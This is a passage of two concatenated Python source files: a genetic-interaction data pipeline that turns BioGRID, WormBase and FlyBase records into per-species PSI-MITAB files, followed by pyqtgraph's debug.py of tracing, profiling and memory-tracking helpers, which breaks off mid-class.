'12': 'psi-mi:"MI:2377"(dosage lethality (sensu biogrid))',
'19': '-', '20': '-' },
'Dosage Rescue': {
'12': 'psi-mi:"MI:2376"(dosage rescue (sensu biogrid))',
'19': 'psi-mi:"MI:0582"(suppressed gene)',
'20': 'psi-mi:"MI:0581"(suppressor gene)' },
'Negative Genetic': {
'12': 'psi-mi:"MI:2373"(negative genetic interaction (sensu biogrid))',
'19': '-', '20': '-' },
'Phenotypic Enhancement': {
'12': 'psi-mi:"MI:2368"(phenotypic enhancement (sensu biogrid))',
'19': 'psi-mi:"MI:2352"(enhanced gene)',
'20': 'psi-mi:"MI:2351"(enhancer gene)' },
'Phenotypic Suppression': {
'12': 'psi-mi:"MI:2374"(phenotypic suppression (sensu biogrid))',
'19': 'psi-mi:"MI:0582"(suppressed gene)',
'20': 'psi-mi:"MI:0581"(suppressor gene)' },
'Positive Genetic': {
'12': 'psi-mi:"MI:2371"(positive genetic interaction (sensu biogrid))',
'19': '-', '20': '-' },
'Synthetic Growth Defect': {
'12': 'psi-mi:"MI:2369"(synthetic growth defect (sensu biogrid))',
'19': '-', '20': '-' },
'Synthetic Haploinsufficiency': {
'12': 'psi-mi:"MI:2372"(synthetic haploinsufficiency (sensu biogrid))',
'19': '-', '20': '-' },
'Synthetic Lethality': {
'12': 'psi-mi:"MI:2370"(synthetic lethality (sensu biogrid))',
'19': '-', '20': '-' },
'Synthetic Rescue': {
'12': 'psi-mi:"MI:2375"(synthetic rescue (sensu biogrid))',
'19': '-', '20': '-' } }
source_filepaths = dict()
interaction_source_config = self.data_type_configs[0]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
source_filepaths[sub_type_name] = sub_type_filepath
for sub_type in source_filepaths:
logger.info("Source subtype %s filepath %s" % (sub_type, source_filepaths[sub_type]))
wormbase_filename = source_filepaths['WB-GEN']
flybase_filename = source_filepaths['FB-GEN']
mitab_filename_zip = source_filepaths['BIOGRID']
mitab_filename = self.download_dir + 'INTERACTION-GEN_BIOGRID'
self.unzip_to_filename(mitab_filename_zip, mitab_filename)
# The order of this list is important.
parsing_list = [wormbase_filename, flybase_filename, mitab_filename]
taxon_species_set = (
'taxid:10116',
'taxid:9606',
'taxid:10090',
'taxid:6239',
'taxid:559292',
'taxid:7955',
'taxid:7227')
possible_yeast_taxon_set = ('taxid:4932', 'taxid:307796', 'taxid:643680', 'taxid:574961', 'taxid:285006', 'taxid:545124', 'taxid:764097')
interactor_type_exclusion_set = ('psi-mi:\"MI:0328\"', 'psi-mi:\"MI:1302\"', 'psi-mi:\"MI:1304\"', 'psi-mi:\"MI:0680\"')
psi_mi_tab_header = [
'#ID(s) interactor A',
'ID(s) interactor B',
'Alt. ID(s) interactor A',
'Alt. ID(s) interactor B',
'Alias(es) interactor A',
'Alias(es) interactor B',
'Interaction detection method(s)',
'Publication 1st author(s)',
'Publication Identifier(s)',
'Taxid interactor A',
'Taxid interactor B',
'Interaction type(s)',
'Source database(s)',
'Interaction identifier(s)',
'Confidence value(s)',
'Expansion method(s)',
'Biological role(s) interactor A',
'Biological role(s) interactor B',
'Experimental role(s) interactor A',
'Experimental role(s) interactor B',
'Type(s) interactor A',
'Type(s) interactor B',
'Xref(s) interactor A',
'Xref(s) interactor B',
'Interaction Xref(s)',
'Annotation(s) interactor A',
'Annotation(s) interactor B',
'Interaction annotation(s)',
'Host organism(s)',
'Interaction parameter(s)',
'Creation date',
'Update date',
'Checksum(s) interactor A',
'Checksum(s) interactor B',
'Interaction Checksum(s)',
'Negative',
'Feature(s) interactor A',
'Feature(s) interactor B',
'Stoichiometry(s) interactor A',
'Stoichiometry(s) interactor B',
'Identification method participant A',
'Identification method participant B'
]
publication_tracking_dict = {}
with open(self.output_dir + 'alliance_genetic_interactions.tsv', 'w', encoding='utf-8') as tsvout, \
open(self.output_dir + 'alliance_genetic_interactions_fly.tsv', 'w', encoding='utf-8') as fb_out, \
open(self.output_dir + 'alliance_genetic_interactions_worm.tsv', 'w', encoding='utf-8') as wb_out, \
open(self.output_dir + 'alliance_genetic_interactions_zebrafish.tsv', 'w', encoding='utf-8') as zfin_out, \
open(self.output_dir + 'alliance_genetic_interactions_yeast.tsv', 'w', encoding='utf-8') as sgd_out, \
open(self.output_dir + 'alliance_genetic_interactions_rat.tsv', 'w', encoding='utf-8') as rgd_out, \
open(self.output_dir + 'alliance_genetic_interactions_mouse.tsv', 'w', encoding='utf-8') as mgi_out, \
open(self.output_dir + 'alliance_genetic_interactions_human.tsv', 'w', encoding='utf-8') as human_out, \
open(self.output_dir + 'genetic_interactions_skipped_entries.tsv', 'w', encoding='utf-8') as skipped_out, \
open(self.output_dir + 'genetic_interactions_mapped_entries.tsv', 'a+', encoding='utf-8') as mapped_out:
tsvout = csv.writer(tsvout, quotechar = '', quoting=csv.QUOTE_NONE, delimiter='\t')
fb_out = csv.writer(fb_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
wb_out = csv.writer(wb_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
zfin_out = csv.writer(zfin_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
sgd_out = csv.writer(sgd_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
rgd_out = csv.writer(rgd_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
mgi_out = csv.writer(mgi_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
human_out = csv.writer(human_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
skipped_out = csv.writer(skipped_out, quotechar = '', quoting=csv.QUOTE_NONE, delimiter='\t')
mapped_out = csv.writer(mapped_out, quotechar = '', quoting=csv.QUOTE_NONE, delimiter='\t')
# This list is now sorted phylogenetically for the header to be sorted
out_write_list = [human_out, rgd_out, mgi_out, zfin_out, fb_out, wb_out, sgd_out]
taxon_file_dispatch_dict = {
'taxid:10116': rgd_out,
'taxid:9606': human_out,
'taxid:10090': mgi_out,
'taxid:6239': wb_out,
'taxid:559292': sgd_out,
'taxid:7955': zfin_out,
'taxid:7227': fb_out,
'taxid:4932': sgd_out,
'taxid:307796': sgd_out,
'taxid:643680': sgd_out,
'taxid:574961': sgd_out,
'taxid:285006': sgd_out,
'taxid:545124': sgd_out,
'taxid:764097': sgd_out
}
out_to_species_name_dict = {
rgd_out: 'Rattus norvegicus',
human_out: 'Homo sapiens',
mgi_out: 'Mus musculus',
wb_out: 'Caenorhabditis elegans',
sgd_out: 'Saccharomyces cerevisiae',
zfin_out: 'Danio rerio',
fb_out: 'Drosophila melanogaster'
}
out_to_header_taxonid_dict = {
rgd_out: 'NCBI:txid10116',
human_out: 'NCBI:txid9606',
mgi_out: 'NCBI:txid10090',
wb_out: 'NCBI:txid6239',
sgd_out: 'NCBI:txid559292',
zfin_out: 'NCBI:txid7955',
fb_out: 'NCBI:txid7227'
}
# Write the comments in the main file.
filetype = 'Genetic Interactions'
data_format = 'PSI-MI TAB 2.7 Format'
database_version = self.context_info.env["ALLIANCE_RELEASE"]
species_list = []
taxon_list = []
for entry in out_write_list:
taxon_list.append(out_to_header_taxonid_dict[entry])
species_list.append(out_to_species_name_dict[entry])
species = ", ".join(species_list)
taxon_ids = ", ".join(taxon_list)
taxon_ids = '# TaxonIDs: {}'.format(taxon_ids)
gen_time = datetime.utcnow().strftime("%Y-%m-%d %H:%M")
readme = 'https://github.com/HUPO-PSI/miTab/blob/master/PSI-MITAB27Format.md'
response = urllib.request.urlopen(self.context_info.env["HEADER_TEMPLATE_URL"])
header_template = HeaderTemplate(response.read().decode('ascii'))
header_dict = {'filetype': filetype, 'data_format': data_format, 'stringency_filter': '',
'taxon_ids': taxon_ids, 'database_version': database_version, 'species': species,
'gen_time': gen_time, 'readme': readme}
header = header_template.substitute(header_dict)
header_rows = [line.strip() for line in header.splitlines() if len(line.strip()) != 0]
for header_row in header_rows:
tsvout.writerow([header_row])
tsvout.writerow(psi_mi_tab_header)
for entry in out_write_list:
filetype = 'Genetic Interactions'
species = out_to_species_name_dict[entry]
taxon_ids = '# TaxonIDs: {}'.format(out_to_header_taxonid_dict[entry])
header_dict = {'filetype': filetype, 'data_format': data_format, 'stringency_filter': '',
'taxon_ids': taxon_ids, 'database_version': database_version, 'species': species,
'gen_time': gen_time, 'readme': readme}
header = header_template.substitute(header_dict)
header_rows = [line.strip() for line in header.splitlines() if len(line.strip()) != 0]
for header_row in header_rows:
entry.writerow([header_row])
entry.writerow(psi_mi_tab_header)
psi_mi_tab_header.insert(0,'Reason for skipping row.')
skipped_out.writerow(psi_mi_tab_header)
# The order of this list is important! Defined in the list above. Cannot be parallelized
for filename in parsing_list:
logger.info('Parsing file: %s' % (filename))
filename_type = None
if filename == mitab_filename:
filename_type = 'biogrid'
elif filename == flybase_filename:
filename_type = 'flybase'
elif filename == wormbase_filename:
filename_type = 'wormbase'
# Declare the tracking dict used to look for duplicates. It tracks sets.
publication_tracking_dict[filename_type] = set()
with open(filename, 'r', encoding='utf-8') as tsvin:
csv_reader = csv.reader(tsvin, delimiter='\t', quoting=csv.QUOTE_NONE)
# for local runs, to see progress
# for row in tqdm(csv_reader):
for row in csv_reader:
if row[0].startswith("#"):
row.insert(0,'Entry starts with # commented out or header')
skipped_out.writerow(row)
continue
if row[8] == '-':
row.insert(0,'Column 9 is blank, no publication')
skipped_out.writerow(row)
continue
if filename_type == 'biogrid':
if row[11] not in approved_col12:
row.insert(0,'col12 does not have an approved value: {}.'.format(row[11]))
skipped_out.writerow(row)
continue
if row[12] != 'psi-mi:"MI:0463"(biogrid)':
row.insert(0,'col13 does not equal psi-mi:"MI:0463"(biogrid): {}.'.format(row[12]))
skipped_out.writerow(row)
continue
ontology_terms = row[15]
# We need to add '-' characters to columns 17-42 for biogrid entries.
for _ in range(17,43):
row.append('-')
row[14] = '-'
row[15] = '-'
row[20] = 'psi-mi:"MI:0250"(gene)'
row[21] = 'psi-mi:"MI:0250"(gene)'
row[35] = 'false'
match_genetic_interaction_type = re.search("\((.+)\)", row[6])
row[11] = match_genetic_interaction_type.group(1)
if row[11] in genetic_interaction_terms:
row[18] = genetic_interaction_terms[row[11]]['19']
row[19] = genetic_interaction_terms[row[11]]['20']
row[11] = genetic_interaction_terms[row[11]]['12']
row[27] = ontology_terms
row[6] = 'psi-mi:"MI:0254"(genetic interference)'
try:
taxon_id_1 = re.search(r'taxid:\d+', row[9]).group(0)
except AttributeError:
row.insert(0,'Taxon ID appears to be missing for interactor A from row 10: %s' % row[9])
skipped_out.writerow(row)
continue # Skip rows where we don't find a taxon entry.
try:
taxon_id_2 = re.search(r'taxid:\d+', row[10]).group(0)
except AttributeError:
row.insert(0,'Taxon ID appears to be missing for interactor B from row 11: %s' % row[10])
skipped_out.writerow(row)
continue # Skip rows where we don't find a taxon entry.
if not taxon_id_1 in (taxon_species_set) or not taxon_id_2 in (taxon_species_set):
row.insert(0,'a taxon in col10 or col11 is not an allowed taxon: {} {}.'.format(taxon_id_1, taxon_id_2))
skipped_out.writerow(row)
continue # Skip rows where we don't have Alliance species or a blank entry.
if taxon_id_1 in possible_yeast_taxon_set: # Change yeast taxon ids to the preferred 'taxid:559292'
row[9] = 'taxid:559292(Saccharomyces cerevisiae)'
if taxon_id_2 in possible_yeast_taxon_set: # Change yeast taxon ids to the preferred 'taxid:559292'
row[10] = 'taxid:559292(Saccharomyces cerevisiae)'
# Skip rows with undesired interaction types.
# Sometimes these columns don't exist in BIOGRID? IndexErrors still write the proper message and skip the entry.
if filename_type != 'biogrid': # Biogrid stops at row 16.
try:
if row[20].startswith(interactor_type_exclusion_set):
row.insert(0,'Contains a term from the interactor type exclusion set.')
skipped_out.writerow(row)
continue
except IndexError:
row.insert(0,'Interactor type column not found? Skipping entry.')
skipped_out.writerow(row)
continue
try:
if row[21].startswith(interactor_type_exclusion_set):
row.insert(0,'Contains a term from the interactor type exclusion set.')
skipped_out.writerow(row)
continue
except IndexError:
row.insert(0,'Interactor type column not found? Skipping entry.')
skipped_out.writerow(row)
continue
# Skip entries which have 'Expansion method(s)'. These only come from IMEx
if row[15] is not '-':
row.insert(0,'Contains an expansion method.')
skipped_out.writerow(row)
continue
interactor_A_resolved, interactor_B_resolved = self.resolve_identifiers_by_row(row, mapped_out)
if interactor_A_resolved is False and interactor_B_resolved is True:
row.insert(0,'Can\'t resolve interactor A identifier, alias, alternate id, or xref against the list of known Alliance identifiers.')
skipped_out.writerow(row)
continue
elif interactor_A_resolved is True and interactor_B_resolved is False:
row.insert(0,'Can\'t resolve interactor B identifier, alias, alternate id, or xref against the list of known Alliance identifiers.')
skipped_out.writerow(row)
continue
elif interactor_A_resolved is False and interactor_B_resolved is False:
row.insert(0,'Can\'t resolve either interactor A or B identifier, alias, alternate id, or xref against the list of known Alliance identifiers.')
skipped_out.writerow(row)
continue
# Capture everything up to the first parenthesis in the taxon column.
taxon1 = re.search(r'taxid:\d+', row[9]).group(0)
taxon2 = re.search(r'taxid:\d+', row[10]).group(0)
# Grab the publication information
# Also creating a tuple "key" to use for filtering purposes.
if row[8] is not None:
publication_re = re.search(r'pubmed:\d+', row[8])
if publication_re is not None:
publication = publication_re.group(0)
# Build a filtering key from the publication, taxon1, and taxon2.
tracking_tuple = (publication, taxon1, taxon2)
exit_tsv_loop = False
for key, value in publication_tracking_dict.items():
if key != filename_type: # Don't look in our current dictionary.
if tracking_tuple in value:
row.insert(0,'Already added this interaction to the export file from %s. Filter criteria: %s' % (key, (tracking_tuple,)))
skipped_out.writerow(row)
exit_tsv_loop = True
if exit_tsv_loop == True:
continue
# If we loop through all the possible sets and don't continue, add the tuple.
publication_tracking_dict[filename_type].add(tracking_tuple)
tsvout.writerow(row)
self.wrote_to_file_already = False
try:
taxon_file_dispatch_dict[taxon1].writerow(row)
self.wrote_to_file_already = True
except KeyError:
pass
try:
if self.wrote_to_file_already is False:
taxon_file_dispatch_dict[taxon2].writerow(row)
except KeyError:
pass
def validate_and_upload_files_to_fms(self):
logger.info('Summary of files created:')
logger.info(os.system("ls -alh {}*".format(self.output_dir)))
upload_location_dict = {
'alliance_genetic_interactions.tsv': 'COMBINED',
'alliance_genetic_interactions_fly.tsv': 'FB',
'alliance_genetic_interactions_worm.tsv': 'WB',
'alliance_genetic_interactions_zebrafish.tsv': 'ZFIN',
'alliance_genetic_interactions_yeast.tsv': 'SGD',
'alliance_genetic_interactions_rat.tsv': 'RGD',
'alliance_genetic_interactions_mouse.tsv': 'MGI',
'alliance_genetic_interactions_human.tsv': 'HUMAN'
}
thread_pool = []
for filename in upload_location_dict.keys():
dataSubType = upload_location_dict[filename]
p = multiprocessing.Process(target=super().fms_upload, args=("INTERACTION-GEN", dataSubType, filename))
p.start()
thread_pool.append(p)
Processor.wait_for_threads(thread_pool)
|
debug.py
|
# -*- coding: utf-8 -*-
"""
debug.py - Functions to aid in debugging
Copyright 2010 Luke Campagnola
Distributed under MIT/X11 license. See license.txt for more infomation.
"""
from __future__ import print_function
import sys, traceback, time, gc, re, types, weakref, inspect, os, cProfile, threading
from . import ptime
from numpy import ndarray
from .Qt import QtCore
from .util.mutex import Mutex
from .util import cprint
__ftraceDepth = 0
def ftrace(func):
"""Decorator used for marking the beginning and end of function calls.
Automatically indents nested calls.
"""
def w(*args, **kargs):
global __ftraceDepth
pfx = " " * __ftraceDepth
print(pfx + func.__name__ + " start")
__ftraceDepth += 1
try:
rv = func(*args, **kargs)
finally:
__ftraceDepth -= 1
print(pfx + func.__name__ + " done")
return rv
return w
class Tracer(object):
"""
Prints every function enter/exit. Useful for debugging crashes / lockups.
"""
def __init__(self):
self.count = 0
self.stack = []
def trace(self, frame, event, arg):
self.count += 1
# If it has been a long time since we saw the top of the stack,
# print a reminder
if self.count % 1000 == 0:
print("----- current stack: -----")
for line in self.stack:
print(line)
if event == 'call':
line = " " * len(self.stack) + ">> " + self.frameInfo(frame)
print(line)
self.stack.append(line)
elif event == 'return':
self.stack.pop()
line = " " * len(self.stack) + "<< " + self.frameInfo(frame)
print(line)
if len(self.stack) == 0:
self.count = 0
return self.trace
def stop(self):
sys.settrace(None)
def start(self):
sys.settrace(self.trace)
def frameInfo(self, fr):
filename = fr.f_code.co_filename
funcname = fr.f_code.co_name
lineno = fr.f_lineno
callfr = sys._getframe(3)
callline = "%s %d" % (callfr.f_code.co_name, callfr.f_lineno)
args, _, _, value_dict = inspect.getargvalues(fr)
if len(args) and args[0] == 'self':
instance = value_dict.get('self', None)
if instance is not None:
cls = getattr(instance, '__class__', None)
if cls is not None:
funcname = cls.__name__ + "." + funcname
return "%s: %s %s: %s" % (callline, filename, lineno, funcname)
def warnOnException(func):
"""Decorator that catches/ignores exceptions and prints a stack trace."""
def w(*args, **kwds):
try:
func(*args, **kwds)
except:
printExc('Ignored exception:')
return w
def getExc(indent=4, prefix='| ', skip=1):
lines = formatException(*sys.exc_info(), skip=skip)
lines2 = []
for l in lines:
lines2.extend(l.strip('\n').split('\n'))
lines3 = [" "*indent + prefix + l for l in lines2]
return '\n'.join(lines3)
def printExc(msg='', indent=4, prefix='|'):
"""Print an error message followed by an indented exception backtrace
(This function is intended to be called within except: blocks)"""
exc = getExc(indent, prefix + ' ', skip=2)
print("[%s] %s\n" % (time.strftime("%H:%M:%S"), msg))
print(" "*indent + prefix + '='*30 + '>>')
print(exc)
print(" "*indent + prefix + '='*30 + '<<')
def printTrace(msg='', indent=4, prefix='|'):
"""Print an error message followed by an indented stack trace"""
trace = backtrace(1)
#exc = getExc(indent, prefix + ' ')
print("[%s] %s\n" % (time.strftime("%H:%M:%S"), msg))
print(" "*indent + prefix + '='*30 + '>>')
for line in trace.split('\n'):
print(" "*indent + prefix + " " + line)
print(" "*indent + prefix + '='*30 + '<<')
def backtrace(skip=0):
return ''.join(traceback.format_stack()[:-(skip+1)])
def formatException(exctype, value, tb, skip=0):
"""Return a list of formatted exception strings.
Similar to traceback.format_exception, but displays the entire stack trace
rather than just the portion downstream of the point where the exception is
caught. In particular, unhandled exceptions that occur during Qt signal
handling do not usually show the portion of the stack that emitted the
signal.
"""
lines = traceback.format_exception(exctype, value, tb)
lines = [lines[0]] + traceback.format_stack()[:-(skip+1)] + [' --- exception caught here ---\n'] + lines[1:]
return lines
def printException(exctype, value, traceback):
"""Print an exception with its full traceback.
Set `sys.excepthook = printException` to ensure that exceptions caught
inside Qt signal handlers are printed with their full stack trace.
"""
print(''.join(formatException(exctype, value, traceback, skip=1)))
def listObjs(regex='Q', typ=None):
"""List all objects managed by python gc with class name matching regex.
Finds 'Q...' classes by default."""
if typ is not None:
return [x for x in gc.get_objects() if isinstance(x, typ)]
else:
return [x for x in gc.get_objects() if re.match(regex, type(x).__name__)]
def findRefPath(startObj, endObj, maxLen=8, restart=True, seen={}, path=None, ignore=None):
"""Determine all paths of object references from startObj to endObj"""
refs = []
if path is None:
path = [endObj]
if ignore is None:
ignore = {}
ignore[id(sys._getframe())] = None
ignore[id(path)] = None
ignore[id(seen)] = None
prefix = " "*(8-maxLen)
#print prefix + str(map(type, path))
prefix += " "
if restart:
#gc.collect()
seen.clear()
gc.collect()
newRefs = [r for r in gc.get_referrers(endObj) if id(r) not in ignore]
ignore[id(newRefs)] = None
#fo = allFrameObjs()
#newRefs = []
#for r in gc.get_referrers(endObj):
#try:
#if r not in fo:
#newRefs.append(r)
#except:
#newRefs.append(r)
for r in newRefs:
#print prefix+"->"+str(type(r))
if type(r).__name__ in ['frame', 'function', 'listiterator']:
#print prefix+" FRAME"
continue
try:
if any([r is x for x in path]):
#print prefix+" LOOP", objChainString([r]+path)
continue
except:
print(r)
print(path)
raise
if r is startObj:
refs.append([r])
print(refPathString([startObj]+path))
continue
if maxLen == 0:
#print prefix+" END:", objChainString([r]+path)
continue
## See if we have already searched this node.
## If not, recurse.
tree = None
try:
cache = seen[id(r)]
if cache[0] >= maxLen:
tree = cache[1]
for p in tree:
print(refPathString(p+path))
except KeyError:
pass
ignore[id(tree)] = None
if tree is None:
tree = findRefPath(startObj, r, maxLen-1, restart=False, path=[r]+path, ignore=ignore)
seen[id(r)] = [maxLen, tree]
## integrate any returned results
if len(tree) == 0:
#print prefix+" EMPTY TREE"
continue
else:
for p in tree:
refs.append(p+[r])
#seen[id(r)] = [maxLen, refs]
return refs
def objString(obj):
"""Return a short but descriptive string for any object"""
try:
if type(obj) in [int, float]:
return str(obj)
elif isinstance(obj, dict):
if len(obj) > 5:
return "<dict {%s,...}>" % (",".join(list(obj.keys())[:5]))
else:
return "<dict {%s}>" % (",".join(list(obj.keys())))
elif isinstance(obj, str):
if len(obj) > 50:
return '"%s..."' % obj[:50]
else:
return obj[:]
elif isinstance(obj, ndarray):
return "<ndarray %s %s>" % (str(obj.dtype), str(obj.shape))
elif hasattr(obj, '__len__'):
if len(obj) > 5:
return "<%s [%s,...]>" % (type(obj).__name__, ",".join([type(o).__name__ for o in obj[:5]]))
else:
return "<%s [%s]>" % (type(obj).__name__, ",".join([type(o).__name__ for o in obj]))
else:
return "<%s %s>" % (type(obj).__name__, obj.__class__.__name__)
except:
return str(type(obj))
def refPathString(chain):
"""Given a list of adjacent objects in a reference path, print the 'natural' path
names (ie, attribute names, keys, and indexes) that follow from one object to the next ."""
s = objString(chain[0])
i = 0
while i < len(chain)-1:
#print " -> ", i
i += 1
o1 = chain[i-1]
o2 = chain[i]
cont = False
if isinstance(o1, list) or isinstance(o1, tuple):
if any([o2 is x for x in o1]):
s += "[%d]" % o1.index(o2)
continue
#print " not list"
if isinstance(o2, dict) and hasattr(o1, '__dict__') and o2 == o1.__dict__:
i += 1
if i >= len(chain):
s += ".__dict__"
continue
o3 = chain[i]
for k in o2:
if o2[k] is o3:
s += '.%s' % k
cont = True
continue
#print " not __dict__"
if isinstance(o1, dict):
try:
if o2 in o1:
s += "[key:%s]" % objString(o2)
continue
except TypeError:
pass
for k in o1:
if o1[k] is o2:
s += "[%s]" % objString(k)
cont = True
continue
#print " not dict"
#for k in dir(o1): ## Not safe to request attributes like this.
#if getattr(o1, k) is o2:
#s += ".%s" % k
#cont = True
#continue
#print " not attr"
if cont:
continue
s += " ? "
sys.stdout.flush()
return s
def objectSize(obj, ignore=None, verbose=False, depth=0, recursive=False):
"""Guess how much memory an object is using"""
ignoreTypes = ['MethodType', 'UnboundMethodType', 'BuiltinMethodType', 'FunctionType', 'BuiltinFunctionType']
ignoreTypes = [getattr(types, key) for key in ignoreTypes if hasattr(types, key)]
ignoreRegex = re.compile('(method-wrapper|Flag|ItemChange|Option|Mode)')
if ignore is None:
ignore = {}
indent = ' '*depth
try:
hash(obj)
hsh = obj
except:
hsh = "%s:%d" % (str(type(obj)), id(obj))
if hsh in ignore:
return 0
ignore[hsh] = 1
try:
size = sys.getsizeof(obj)
except TypeError:
size = 0
if isinstance(obj, ndarray):
try:
size += len(obj.data)
except:
pass
if recursive:
if type(obj) in [list, tuple]:
if verbose:
print(indent+"list:")
for o in obj:
s = objectSize(o, ignore=ignore, verbose=verbose, depth=depth+1)
if verbose:
print(indent+' +', s)
size += s
elif isinstance(obj, dict):
if verbose:
print(indent+"list:")
for k in obj:
s = objectSize(obj[k], ignore=ignore, verbose=verbose, depth=depth+1)
if verbose:
print(indent+' +', k, s)
size += s
#elif isinstance(obj, QtCore.QObject):
#try:
#childs = obj.children()
#if verbose:
#print indent+"Qt children:"
#for ch in childs:
#s = objectSize(obj, ignore=ignore, verbose=verbose, depth=depth+1)
#size += s
#if verbose:
#print indent + ' +', ch.objectName(), s
#except:
#pass
#if isinstance(obj, types.InstanceType):
gc.collect()
if verbose:
print(indent+'attrs:')
for k in dir(obj):
if k in ['__dict__']:
continue
o = getattr(obj, k)
if type(o) in ignoreTypes:
continue
strtyp = str(type(o))
if ignoreRegex.search(strtyp):
continue
#if isinstance(o, types.ObjectType) and strtyp == "<type 'method-wrapper'>":
#continue
#if verbose:
#print indent, k, '?'
refs = [r for r in gc.get_referrers(o) if type(r) != types.FrameType]
if len(refs) == 1:
s = objectSize(o, ignore=ignore, verbose=verbose, depth=depth+1)
size += s
if verbose:
print(indent + " +", k, s)
#else:
#if verbose:
#print indent + ' -', k, len(refs)
return size
class GarbageWatcher(object):
"""
Convenient dictionary for holding weak references to objects.
Mainly used to check whether the objects have been collect yet or not.
Example:
gw = GarbageWatcher()
gw['objName'] = obj
gw['objName2'] = obj2
gw.check()
"""
def __init__(self):
self.objs = weakref.WeakValueDictionary()
self.allNames = []
def add(self, obj, name):
self.objs[name] = obj
self.allNames.append(name)
def __setitem__(self, name, obj):
self.add(obj, name)
def check(self):
"""Print a list of all watched objects and whether they have been collected."""
gc.collect()
dead = self.allNames[:]
alive = []
for k in self.objs:
dead.remove(k)
alive.append(k)
print("Deleted objects:", dead)
print("Live objects:", alive)
def __getitem__(self, item):
return self.objs[item]
class Profiler(object):
"""Simple profiler allowing measurement of multiple time intervals.
By default, profilers are disabled. To enable profiling, set the
environment variable `PYQTGRAPHPROFILE` to a comma-separated list of
fully-qualified names of profiled functions.
Calling a profiler registers a message (defaulting to an increasing
counter) that contains the time elapsed since the last call. When the
profiler is about to be garbage-collected, the messages are passed to the
outer profiler if one is running, or printed to stdout otherwise.
If `delayed` is set to False, messages are immediately printed instead.
Example:
def function(...):
profiler = Profiler()
... do stuff ...
profiler('did stuff')
... do other stuff ...
profiler('did other stuff')
# profiler is garbage-collected and flushed at function end
If this function is a method of class C, setting `PYQTGRAPHPROFILE` to
"C.function" (without the module name) will enable this profiler.
For regular functions, use the qualified name of the function, stripping
only the initial "pyqtgraph." prefix from the module.
"""
_profilers = os.environ.get("PYQTGRAPHPROFILE", None)
_profilers = _profilers.split(",") if _profilers is not None else []
_depth = 0
_msgs = []
disable = False # set this flag to disable all or individual profilers at runtime
class DisabledProfiler(object):
def __init__(self, *args, **kwds):
pass
def __call__(self, *args):
pass
def finish(self):
pass
def mark(self, msg=None):
pass
_disabledProfiler = DisabledProfiler()
def __new__(cls, msg=None, disabled='env', delayed=True):
"""Optionally create a new profiler based on caller's qualname.
"""
if disabled is True or (disabled == 'env' and len(cls._profilers) == 0):
return cls._disabledProfiler
# determine the qualified name of the caller function
caller_frame = sys._getframe(1)
try:
caller_object_type = type(caller_frame.f_locals["self"])
except KeyError: # we are in a regular function
qualifier = caller_frame.f_globals["__name__"].split(".", 1)[-1]
else: # we are in a method
qualifier = caller_object_type.__name__
func_qualname = qualifier + "." + caller_frame.f_code.co_name
if disabled == 'env' and func_qualname not in cls._profilers: # don't do anything
return cls._disabledProfiler
# create an actual profiling object
cls._depth += 1
obj = super(Profiler, cls).__new__(cls)
obj._name = msg or func_qualname
obj._delayed = delayed
obj._markCount = 0
obj._finished = False
obj._firstTime = obj._lastTime = ptime.time()
obj._newMsg("> Entering " + obj._name)
return obj
def __call__(self, msg=None):
"""Register or print a new message with timing information.
"""
if self.disable:
return
if msg is None:
msg = str(self._markCount)
self._markCount += 1
newTime = ptime.time()
self._newMsg(" %s: %0.4f ms",
msg, (newTime - self._lastTime) * 1000)
self._lastTime = newTime
def mark(self, msg=None):
self(msg)
def _newMsg(self, msg, *args):
msg = " " * (self._depth - 1) + msg
if self._delayed:
self._msgs.append((msg, args))
else:
self.flush()
print(msg % args)
def __del__(self):
self.finish()
def finish(self, msg=None):
"""Add a final message; flush the message list if no parent profiler.
"""
if self._finished or self.disable:
return
self._finished = True
if msg is not None:
self(msg)
self._newMsg("< Exiting %s, total time: %0.4f ms",
self._name, (ptime.time() - self._firstTime) * 1000)
type(self)._depth -= 1
if self._depth < 1:
self.flush()
def flush(self):
if self._msgs:
print("\n".join([m[0]%m[1] for m in self._msgs]))
type(self)._msgs = []
def profile(code, name='profile_run', sort='cumulative', num=30):
"""Common-use for cProfile"""
cProfile.run(code, name)
stats = pstats.Stats(name)
stats.sort_stats(sort)
stats.print_stats(num)
return stats
#### Code for listing (nearly) all objects in the known universe
#### http://utcc.utoronto.ca/~cks/space/blog/python/GetAllObjects
# Recursively expand slist's objects
# into olist, using seen to track
# already processed objects.
def _getr(slist, olist, first=True):
i = 0
for e in slist:
oid = id(e)
typ = type(e)
if oid in olist or typ is int: ## or e in olist: ## since we're excluding all ints, there is no longer a need to check for olist keys
continue
olist[oid] = e
if first and (i%1000) == 0:
gc.collect()
tl = gc.get_referents(e)
if tl:
_getr(tl, olist, first=False)
i += 1
# The public function.
def get_all_objects():
"""Return a list of all live Python objects (excluding int and long), not including the list itself."""
gc.collect()
gcl = gc.get_objects()
olist = {}
_getr(gcl, olist)
del olist[id(olist)]
del olist[id(gcl)]
del olist[id(sys._getframe())]
return olist
def lookup(oid, objects=None):
"""Return an object given its ID, if it exists."""
if objects is None:
objects = get_all_objects()
return objects[oid]
class ObjTracker(object):
"""
Tracks all objects under the sun, reporting the changes between snapshots: what objects are created, deleted, and persistent.
This class is very useful for tracking memory leaks. The class goes to great (but not heroic) lengths to avoid tracking
its own internal objects.
Example:
ot = ObjTracker() # takes snapshot of currently existing objects
... do stuff ...
ot.diff() # prints lists of objects created and deleted since ot was initialized
... do stuff ...
ot.diff() # prints lists of objects created and deleted since last call to ot.diff()
# also prints list of items that were created since initialization AND have not been deleted yet
# (if done correctly, this list can tell you about objects that were leaked)
arrays = ot.findPersistent('ndarray') ## returns all objects matching 'ndarray' (string match, not instance checking)
## that were considered persistent when the last diff() was run
describeObj(arrays[0]) ## See if we can determine who has references to this array
"""
allObjs = {} ## keep track of all objects created and stored within class instances
allObjs[id(allObjs)] = None
def __init__(self):
self.startRefs = {} ## list of objects that exist when the tracker is initialized {oid: weakref}
## (If it is not possible to weakref the object, then the value is None)
self.startCount = {}
self.newRefs = {} ## list of objects that have been created since initialization
self.persistentRefs = {} ## list of objects considered 'persistent' when the last diff() was called
